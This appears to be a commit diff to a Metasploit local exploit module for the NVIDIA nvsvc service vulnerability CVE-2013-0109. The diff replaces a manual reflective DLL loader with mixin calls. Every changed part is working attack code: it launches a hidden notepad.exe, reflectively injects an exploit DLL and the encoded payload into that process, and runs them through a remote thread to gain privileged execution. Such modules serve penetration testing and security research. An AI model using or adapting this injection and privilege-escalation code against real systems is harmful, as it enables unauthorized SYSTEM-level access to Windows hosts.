Re-add RDI mixin changes

modules/exploits/windows/local/nvidia_nvsvc.rb

@@ -120,12 +120,6 @@ class Metasploit3 < Msf::Exploit::Local
     end
   end
 
-  def create_proc
-    windir = expand_path("%windir%")
-    cmd = "#{windir}\\SysWOW64\\notepad.exe"
-    return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
-  end
-
   def is_running?
     begin
       status = service_status('nvsvc')
@@ -134,60 +128,39 @@ class Metasploit3 < Msf::Exploit::Local
       print_error("Unable to retrieve service status")
       return false
     end
-
   end
 
   def exploit
-    unless is_running?
-      print_error("Service not running - attempting to start")
-      res = service_start('nvsvc')
-      case res
-      when 0
-        print_good("Service started")
-      when 1
-        print_status("Service already started")
-      else
-        fail_with(Exploit::Failure::Unknown, "Unable to start service")
-      end
-    else
-      print_good("Service is running")
+    if is_system?
+      fail_with(Exploit::Failure::None, 'Session is already elevated')
     end
 
-    dll = ''
-    offset = nil
-    file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
-    File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
-
-    pay = payload.encoded
-
-    bo = dll.index('PAYLOAD:')
-    raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
-    dll[bo, pay.length] = [pay].pack("a*")
-
-    pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
-
-    pe.exports.entries.each do |entry|
-      if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
-        offset = pe.rva_to_file_offset( entry.rva )
-        break
-      end
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
     end
 
-    print_error("No offset found") unless offset
+    print_status("Launching notepad to host the exploit...")
+    process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
+    host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{process.pid} launched.")
 
-    new_pid = create_proc
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    library_path = ::File.join(Msf::Config.data_directory, "exploits",
+                               "CVE-2013-0109", "nvidia_nvsvc.x86.dll")
+    library_path = ::File.expand_path(library_path)
 
-    if not new_pid
-      fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
-    end
+    print_status("Injecting exploit into #{process.pid} ...")
+    exploit_mem, offset = inject_dll_into_process(host_process, library_path)
 
-    vprint_status("Injecting payload into memory")
-    host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
-    mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
-    host_process.memory.protect(mem)
-    host_process.memory.write(mem, dll)
-    print_status("Executing exploit...")
-    host_process.thread.create(mem+offset)
+    print_status("Exploit injected. Injecting payload into #{process.pid}...")
+    payload_mem = inject_into_process(host_process, payload.encoded)
+
+    # invoke the exploit, passing in the address of the payload that
+    # we want invoked on successful exploitation.
+    print_status("Payload injected. Executing exploit...")
+    host_process.thread.create(exploit_mem + offset, payload_mem)
+
+    print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
   end
 end